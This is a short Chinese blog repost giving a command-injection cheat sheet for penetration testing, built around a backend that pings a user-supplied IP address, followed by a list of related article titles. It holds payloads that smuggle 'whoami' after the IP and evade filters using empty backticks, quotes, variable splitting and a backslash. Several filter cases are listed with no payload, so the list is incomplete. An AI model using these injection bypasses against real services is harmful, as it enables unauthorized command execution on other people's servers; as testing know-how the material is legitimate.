命令执行常用命令
本文共 450 字,大约阅读时间需要 1 分钟。
在***测试过程中,会遇见一些关于命令执行的漏洞,下面是收集的一些常用命令:
; < > <> | || & && `` () ' '
假设一种场景,从前端接收ip比如:127.0.0.1,后端对该ip进行ping测试: ping 127.0.0.1
-
没有任何防护
-
过滤了|
-
过滤了 ; |
-
过滤了 ; | &
-
过滤了 whoami关键字
ping -c 1 127.0.0.1|wh``oami
-
过滤了whoami ``
ping -c 1 127.0.0.1|wh''oami
-
过滤了whoami `` ''
ping -c 1 127.0.0.1;a=who;b=ami;$a$b
-
过滤了whoami `` '' $
ping -c 1 127.0.0.1|whoam""i
- 过滤了whoami `` '' $ "" ; ping -c 1 127.0.0.1|whoam\i
转载于:https://blog.51cto.com/13770310/2121065
你可能感兴趣的文章
分组背包问题
查看>>
css的再深入4(更新中···)
查看>>
一道面试题
查看>>
大公司里怎样开发和部署前端代码?
查看>>
如何安装pycharm
查看>>
《Windows Internal》(2)
查看>>
数据监听进阶
查看>>
HTML5之Canvas绘图——图像切割函数clip
查看>>
五、箭头函数
查看>>
阿里Android开发规范:文件与数据库
查看>>
Android组件化专题 - 路由框架原理
查看>>
JQuery筛选器全系列介绍
查看>>
异步解决方案一:promise
查看>>
Clocksource tsc unstable
查看>>
两个sed小技巧:sed "/变量/变量/"
查看>>
ArrayAdapter的简单应用实例(初级入门引导)
查看>>
这大概是今年介绍云原生最清晰明了的文章!
查看>>
COGS314. [NOI2004] 郁闷的出纳员
查看>>
angular 7报错
查看>>
svn 删除svn项目命令
查看>>